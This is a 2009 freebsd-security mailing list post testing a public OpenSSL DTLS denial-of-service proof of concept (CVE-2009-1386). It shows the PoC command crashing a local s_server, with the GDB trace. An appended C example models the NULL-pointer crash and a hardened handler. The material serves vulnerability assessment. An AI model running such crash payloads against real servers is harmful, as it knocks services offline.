OpenSSL DoS/PoC in milw0rm

Pieter de Boer pieter at thedarkside.nl
Thu Jun 4 21:47:00 UTC 2009


Oliver Pinter wrote:

> the base system contains 0.9.8e and this PoC is affected up to 0.9.8i
> not yet tested
> the question is, is FreeBSD affected by this error/malware/PoC?
> http://milw0rm.com/exploits/8873

(term1)
OpenSSL> version
OpenSSL 0.9.8e 23 Feb 2007

% openssl s_server -cert /usr/src/crypto/openssl/apps/server.pem -accept 1234 -dtls1

...
(term2)
% ./cve-2009-1386 localhost 1234
[+] Sending DTLS datagram of death at localhost:1234...

...
(term1)
zsh: segmentation fault (core dumped)  openssl s_server -cert /usr/src/crypto/openssl/apps/server.pem -accept 1234


GDB shows:

Program received signal SIGSEGV, Segmentation fault.
0x480fe28d in ssl3_do_change_cipher_spec () from /usr/lib/libssl.so.5
...
0x480fe28d <ssl3_do_change_cipher_spec+189>:	mov    %eax,0xac(%edx)
...
(gdb) i r edx
edx            0x0	0


Looks vulnerable, but I had to force DTLS using the -dtls1 switch, so it
may not be much of an issue in most real world configurations?

-- 
Pieter
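As an added illustration, not part of this thread and not OpenSSL's code: a simplified C model of the failure mode the GDB output above shows, a store through a per-connection state pointer that is still NULL because the message arrived before the handshake ever allocated it, beside a handler that treats such an out-of-order message as a protocol error and drops it so the listener keeps serving. The structures and function names (`session`, `record_state`, `change_cipher_spec_checked`, `dispatch_checked`) are hypothetical and the message trace is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed, simplified session model for this example. These are NOT
 * OpenSSL's structures; the names are hypothetical. The only property kept
 * from the real library is the one the crash depends on: the per-connection
 * write state is allocated during the handshake and is NULL before it. */
typedef struct {
    int cipher_ready;   /* set once ChangeCipherSpec is accepted */
    int write_seq;      /* record sequence number, reset on CCS */
} record_state;

typedef struct {
    int handshake_started;
    record_state *write_state;  /* NULL until a ClientHello has been processed */
} session;

enum { MSG_CLIENT_HELLO = 1, MSG_CHANGE_CIPHER_SPEC = 20 };

/* Allocates the write state; in a real stack this happens during the handshake. */
static int process_client_hello(session *s) {
    if (s->write_state == NULL) {
        s->write_state = calloc(1, sizeof *s->write_state);
        if (s->write_state == NULL)
            return -1;
    }
    s->handshake_started = 1;
    return 0;
}

/* Unchecked handler: stores through write_state without asking whether the
 * handshake ever created it. Called on a fresh session it dereferences NULL,
 * the same shape as the faulting instruction in the post (a store to a fixed
 * offset off a zero base register). Only safe after process_client_hello(). */
static int change_cipher_spec_unchecked(session *s) {
    s->write_state->cipher_ready = 1;
    s->write_state->write_seq = 0;
    return 0;
}

/* Hardened handler: a CCS that arrives before the state it needs exists is an
 * out-of-order message and is rejected; the connection state is untouched. */
static int change_cipher_spec_checked(session *s) {
    if (!s->handshake_started || s->write_state == NULL)
        return -1;
    s->write_state->cipher_ready = 1;
    s->write_state->write_seq = 0;
    return 0;
}

/* Feeds a sequence of record types to the checked handlers and returns how
 * many were rejected. Unknown record types are rejected as well. */
static int dispatch_checked(session *s, const int *types, size_t n) {
    int rejected = 0;
    for (size_t i = 0; i < n; i++) {
        int rc;
        switch (types[i]) {
        case MSG_CLIENT_HELLO:       rc = process_client_hello(s); break;
        case MSG_CHANGE_CIPHER_SPEC: rc = change_cipher_spec_checked(s); break;
        default:                     rc = -1; break;
        }
        if (rc != 0)
            rejected++;
    }
    return rejected;
}

int main(void) {
    /* Constructed trace: a CCS before any ClientHello, then a valid sequence. */
    const int trace[] = { MSG_CHANGE_CIPHER_SPEC, MSG_CLIENT_HELLO, MSG_CHANGE_CIPHER_SPEC };
    session s = { 0, NULL };
    int rejected = dispatch_checked(&s, trace, sizeof trace / sizeof trace[0]);
    printf("rejected out-of-order records: %d, cipher_ready=%d\n",
           rejected, s.write_state ? s.write_state->cipher_ready : -1);
    free(s.write_state);
    return 0;
}
```

The check in `change_cipher_spec_checked` is the whole fix: the first CCS in the trace is dropped with no state change, and the identical message after the ClientHello is accepted normally, so a stray datagram costs one rejected record instead of the daemon.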



More information about the freebsd-security mailing list